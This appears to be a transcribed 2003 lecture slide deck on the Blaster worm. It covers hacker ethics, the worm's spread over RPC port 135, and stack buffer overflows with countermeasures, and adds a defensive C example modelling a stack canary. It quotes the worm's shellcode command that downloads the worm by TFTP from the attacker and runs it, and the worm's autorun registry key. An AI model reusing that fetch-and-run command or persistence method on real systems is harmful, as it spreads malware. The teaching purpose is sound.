Post on 19-Dec-2015
Analysis of the Internet Worm of August 2003
INFORMATION AND COMPUTER SCIENCE DEPARTMENT
Dr. K. Salah
September 2003
September 2003INFORMATION AND COMPUTER SCIENCE DEPARTMENTAnalysis of the Internet Worm of August 2003
Agenda
• Reasons for Talk
• Some Jargon
• Ethics of Hackers
• Why Can’t Our Kids Hack?
• Example of Hacker Attacks
• W32 Blaster Worm
• Smashing the Stack for Fun and Profit
• More Information
Reasons for Talk
• Know Your Enemy!
– Prophet of Islam says, “من تعلم لغة قوم أمن مكرهم” (“Whoever learns the language of a people is safe from their cunning”).
– “Know your enemy and know yourself and you can fight a hundred battles without disaster,” Sun Tzu.
• Knowledge is power!
– Understand hack tactics, strategies, and tricks.
– Be better prepared
– Design and write better code
– Take countermeasures.
• Know something about the ethics of hackers
• Testify how smart the hackers are!
• Research
Some Jargon
• Hoax vs. Worm vs. Virus
• Trojan Horse
• Crackers vs. Hackers vs. Intruder
• DOS attack
The Hacker Ethic
• Hackers have ethics, according to Socrates.
• "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.
– Translated into 15 languages
– Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.
– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.
– http://www.hackerethic.org
– http://www.ils.unc.edu/gbnewby/ethics/index.html
• Why hacking?
• Enjoy the challenge and excitement
• Joy, fun, ego, and recognition
• Hate Microsoft products and practices
– The battle with google.com has started
Hacker Ethics
• Information should be free
– Driving Linux/Apache and Open Source Code
– Technology is only good if you get other people to join you in developing and using it. Info should always be disclosed.
– Not all people can afford to buy software or information
– No concern for copyright laws/abuses, intellectual property, passwords, data security!
• Hacking is essential to show security holes and vulnerabilities
– So many hackers are security gurus
– A way to make a living and learn about computers
• Hackers are not doing real harm
– Pushing technology to its knees
– “We are just curious and inquisitive people… we want to chart new territory and look around,” Craig Neidorf
– Craig Neidorf is the founder of Phrack Magazine and a member of the 2600 club. His email is route@underground.org
Kids and Hacking
• Kids are very curious, and thus become hackers.
• They have much more time and fewer responsibilities!
• They look for recognition and fun
• Usually kids fall victims and get caught first
• Originators of attacks are yet to be found
• What does it really take to be a hacker?
– Some knowledge of C and Assembly programming
– Some knowledge of OS
– Some knowledge of Networking (TCP/IP)
– (Beware!!! These are our ICS and COE students!!!)
[Screenshot slides: “Connected to www.test.com”]
Kids and Hacking
• Shall we give up hope?
– The 1998 registrar incident
• So, why can’t our kids hack?
– Digital Divide
– English
– Busy and distracted…
Fun, Attacks, or Damages
[Screenshot slides dated August 17, 1996 and August 14, 2003]
The Blaster Worm
• Affected Windows XP and Windows 2000
• Causes Windows NT machines to crash when it tries to exploit them
• Has many variants: Blaster-A, Blaster-B, … Blaster-F
– Blaster-F was linked to a Romanian student
• This is a worm, not a virus; it eats up network bandwidth.
• Encouraged other hackers to release other worms: Sobig, Welchia, etc.
• Microsoft called it, “A security issue has been identified…”
Technical Details
1) An infected system scans the network for any computer listening on TCP port 135 (the Windows RPC/DCOM port).
– TCP port 135 is used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things.
– “The Art of Port Scanning” by fyodor@dhp.com Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11
[Diagram: Infected host probes Target host for TCP port 135 (“135 ?”)]
Technical Details
2) The infected system attempts to exploit the RPC buffer overflow on those systems listening on TCP port 135.
– The buffer overflow attack is explained later.
[Diagram: Infected host sends the RPC buffer overflow to Target host on port 135; the victim then listens on TCP port 4444]
Technical Details
3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an egg) and causes it to hatch:
– It starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm, “msblast.exe”
– Inside the shell code, it runs the command: “cmd \c tftp –i appaddress worm.exe & worm.exe & exit”
– “msblast.exe” is packed with the UPX compression utility, is self-extracting, and is 11KB once unpacked.
[Diagram: Infected host and Target host, ports 135 / 4444 / 69: (1) tftp attackerIP GET msblast.exe; (2) msblast.exe gets downloaded; (3) execute worm.exe]
Technical Details
4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135.
– A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!”
– The code creates a mutex called “BILLY” to avoid running multiple times.
– It also adds a registry entry so that it always runs on Windows restart: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe"
[Diagram: each Infected host scans further hosts for TCP port 135 (“135?”)]
Technical Details
• A secondary payload in the worm is supposedly meant to make all infected systems launch a DOS attack against the MS windowsupdate.com website on 16 August 2003.
– Why August 16?
– Any relation to the DOJ Hack?
• If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.
Buffer Overflow Attack
• First Rule of Hacking: Do everything you are not supposed to?
– If you can’t change the flow of execution, crash it!
• Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd.
• Code Red worm of 2001, exploiting a buffer overflow vulnerability in Microsoft IIS (Internet Information Server).
• The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC.
• The next attack will be most likely linked to buffer overflow
[Chart: CERT security alerts by year, up to the first 2 months of 2002]
Buffer Overflow Attack
• The best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49), published in 1996: “Smashing the Stack for Fun and Profit,” by AlephOne@underground.org, http://www.phrack.org/show.php?p=49&a=14
Buffer Overflow Attack
[Stack layout diagram]
  Bottom of stack / Top of memory
    c = 3
    b = 2
    a = 1
    ret address
    sfp
    buffer [5]
    buffer [10]
  Top of stack / Bottom of memory
  (Stack grows upward; buffer grows downward)
Buffer Overflow Attack
[Stack layout diagram]
  Bottom of stack / Top of memory
    *str
    ret address
    sfp
    buffer [16]
  Top of stack / Bottom of memory
  (Stack grows upward; buffer grows downward)
Buffer Overflow Attack
Partial List of Unsafe Functions in the Standard C Library:
Buffer Overflow Attack Countermeasures
• Validate all arguments or parameters received whenever you write a function.
– Bounds checking
– Performance is compromised!!
• Use secure functions instead, e.g., strncpy() and strncat()
• Use safe compilers
– Watch out for free compilers!!! Can be made by hackers, for hackers!
• Test your code thoroughly
• Keep applying patches
• A good site for advisories is CERT at the Carnegie Mellon SWE Institute
– http://www.cert.org/advisories
Can this attack ever be eliminated?
Research on Protecting the Stack
• A good number of references is found in:
– http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf
• How?
– Splitting the control stack from the data stack
• Control stack contains return addresses
• Data stack contains local variables and passed parameters
– Use middleware software (libsafe) to intercept calls to library functions known to be vulnerable.
– Using StackGuard and StackShield
• Adding more code at the beginning and end of each function
• Check to see if the ret address is altered and signal a violation
– Others
– Performance due to overhead is always an issue!
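The frame shown in the two stack diagrams (buffer, sfp, return address), the bounds-checking countermeasure, and the StackGuard return-address check, as an added example in C that is not from the slides or from StackGuard itself: the struct only models a frame (real frames are laid out by the compiler), and CANARY, FAKE_RET and the two sample inputs are constructed.

```c
/* Added example, not from the slides: models the diagram's frame (buffer[16],
 * sfp, ret) plus a StackGuard-style canary; all values are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CANARY   0x4A5B6C7D8E9FA0B1ULL   /* guard value */
#define FAKE_RET 0x0000000000401000ULL   /* stand-in return address */

struct frame {             /* a model; the compiler lays out real frames */
    char     buffer[16];
    uint64_t canary;       /* guard word between data and control fields */
    uint64_t sfp;          /* saved frame pointer */
    uint64_t ret;          /* return address */
};

const char sample_short[] = "hello";                                       /* fits */
const char sample_long[]  = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 44 bytes */

/* strcpy-style copy with no bounds check: bytes past buffer[16] land on the
 * canary, sfp and ret. Copying into the struct's byte representation, clamped
 * to its size, keeps the model itself well defined. */
void copy_unchecked(struct frame *f, const char *src, size_t len) {
    memcpy((unsigned char *)f, src, len > sizeof *f ? sizeof *f : len);
}

/* Countermeasure from the slides: validate the argument before copying.
 * Unlike strncpy this always NUL-terminates; -1 reports truncation. */
int copy_checked(struct frame *f, const char *src) {
    size_t n = strlen(src), cap = sizeof f->buffer - 1;
    int truncated = n > cap;
    if (truncated) n = cap;
    memcpy(f->buffer, src, n);
    f->buffer[n] = '\0';
    return truncated ? -1 : 0;
}

/* Outcome of an unchecked copy: bit 0 = canary tripped (what a StackGuard
 * epilogue checks before returning), bit 1 = return address overwritten. */
int unchecked_outcome(const char *src, size_t len) {
    struct frame f = { .canary = CANARY, .ret = FAKE_RET };  /* rest zeroed */
    copy_unchecked(&f, src, len);
    return (f.canary != CANARY) | ((f.ret != FAKE_RET) << 1);
}

int main(void) {
    printf("short=%d long=%d\n", unchecked_outcome(sample_short, 5),
           unchecked_outcome(sample_long, sizeof sample_long - 1));
    return 0;
}
```

A 24-byte input trips the canary without reaching the return address, which is exactly the case the epilogue check is there to catch before the corrupted frame is used.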
The Adventure Continues
• Bypassing the fix for smashing the stack
– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard
• http://www.immunix.org/documentation.html
– In the May 2000 issue of Phrack Magazine (www.phrack.org)
• “Bypassing StackGuard and StackShield” by Bulba and Kil3r <lam3rz@hert.org>
Curious about More Hacking Techniques
Compulsory Reading: "Hacking Exposed"